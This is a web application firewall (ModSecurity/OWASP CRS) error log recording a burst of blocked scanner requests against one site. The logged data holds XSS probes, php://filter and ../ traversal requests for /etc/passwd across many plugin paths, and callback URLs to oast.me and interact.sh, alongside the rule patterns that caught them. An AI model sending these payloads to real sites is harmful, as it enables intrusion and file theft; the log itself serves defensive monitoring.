[Tue Aug 29 11:53:12.182431 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15uMCo-f0AAAoT7UsAAAAD"]
[Tue Aug 29 11:53:12.682907 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAoqbPoAAAAj"]
[Tue Aug 29 11:53:14.463494 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAojapEAAAAb"]
[Tue Aug 29 11:53:14.631375 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAolKUkAAAAe"]
[Tue Aug 29 11:53:15.765381 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAoLfRMAAAAG"]
[Tue Aug 29 11:53:16.665507 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAoAkyEAAAAC"]
[Tue Aug 29 11:53:17.656284 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAoLfRkAAAAG"]
[Tue Aug 29 11:53:18.589740 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAosCwUAAAAm"]
[Tue Aug 29 11:53:18.736371 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAofm6QAAAAX"]
[Tue Aug 29 11:53:19.843839 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAosCwgAAAAm"]
[Tue Aug 29 11:53:19.865686 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAoesNMAAAAV"]
[Tue Aug 29 11:53:20.167018 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAot8OkAAAAn"]
[Tue Aug 29 11:53:20.547507 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAoAky4AAAAC"]
[Tue Aug 29 11:53:21.676275 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAofm7AAAAAX"]
[Tue Aug 29 11:53:22.536120 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAni-DoAAAAU"]
[Tue Aug 29 11:53:23.388702 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAofm7IAAAAX"]
[Tue Aug 29 11:53:23.902942 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15w8Co-f0AAAot8PcAAAAn"]
[Tue Aug 29 11:53:24.696376 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAoXJw0AAAAP"]
[Tue Aug 29 11:53:24.755085 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAox7GgAAAAN"]
[Tue Aug 29 11:53:25.716599 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAofm7gAAAAX"]
[Tue Aug 29 11:53:25.881668 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xcCo-f0AAAog@FQAAAAY"]
[Tue Aug 29 11:53:27.107792 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoT7X0AAAAD"]
[Tue Aug 29 11:53:27.206584 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAoAk0AAAAAC"]
[Tue Aug 29 11:53:27.742927 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoT7YMAAAAD"]
[Tue Aug 29 11:53:28.047583 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAni-EwAAAAU"]
[Tue Aug 29 11:53:28.113559 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15yMCo-f0AAAoW7QcAAAAJ"]
[Tue Aug 29 11:53:28.817541 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAnHQrUAAAAT"]
[Tue Aug 29 11:53:28.818129 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAoXJxwAAAAP"]
[Tue Aug 29 11:53:30.595032 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAowNqAAAAAH"]
[Tue Aug 29 11:53:31.233245 2023] [:error] [pid 2615] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAo3IeMAAAAa"]
